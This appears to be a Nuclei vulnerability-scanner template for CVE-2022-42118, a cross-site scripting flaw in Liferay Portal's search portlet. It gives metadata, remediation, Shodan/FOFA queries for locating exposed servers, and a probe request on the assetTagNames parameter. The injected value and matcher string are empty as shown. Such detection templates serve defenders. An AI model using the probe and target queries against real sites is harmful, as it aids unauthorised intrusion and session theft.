id: CVE-2022-42118 info: name: Liferay Portal - Cross-site Scripting author: ritikchaddha severity: medium description: | A Cross-site scripting (XSS) vulnerability in the Portal Search module in Liferay Portal 7.1.0 through 7.4.2, and Liferay DXP 7.1 before fix pack 27, 7.2 before fix pack 15, and 7.3 before service pack 3 allows remote attackers to inject arbitrary web script or HTML via the `tag` parameter. impact: | Unauthenticated attackers can inject malicious JavaScript through the tag parameter in the Portal Search module to steal Liferay Portal user session cookies and credentials. remediation: | Update to Liferay Portal 7.4.3+, DXP 7.1 fix pack 27+, DXP 7.2 fix pack 15+, or DXP 7.3 service pack 3+. reference: - https://issues.liferay.com/browse/LPE-17342 - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/cve-2022-42118 - https://nvd.nist.gov/vuln/detail/CVE-2022-42118 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-42118 cwe-id: CWE-79 epss-score: 0.13205 epss-percentile: 0.94268 cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* metadata: vendor: liferay product: liferay_portal shodan-query: html:"var Liferay" fofa-query: body="var Liferay" tags: cve,cve2022,liferay,xss,vuln http: - method: GET path: - "{{BaseURL}}/web/guest/home?p_p_id=com_liferay_portal_search_web_portlet_SearchPortlet&p_p_lifecycle=0&_com_liferay_portal_search_web_portlet_SearchPortlet_keywords=test&_com_liferay_portal_search_web_portlet_SearchPortlet_scope=this-site&_com_liferay_portal_search_web_portlet_SearchPortlet_assetTagNames=" matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - "text/html" - "Liferay Portal" condition: and - type: status status: - 200 # digest: 4a0a0047304502204dd99f9ddb2dcbe65982fdb54aaa3965a4d7ed316be49edb16c7450b9a8a13ed02210090d560ccd9e233f4b87cfa7b42585879956068690cda29b60ef4a4424457c60e:922c64590222798bb761d5b6d8e72950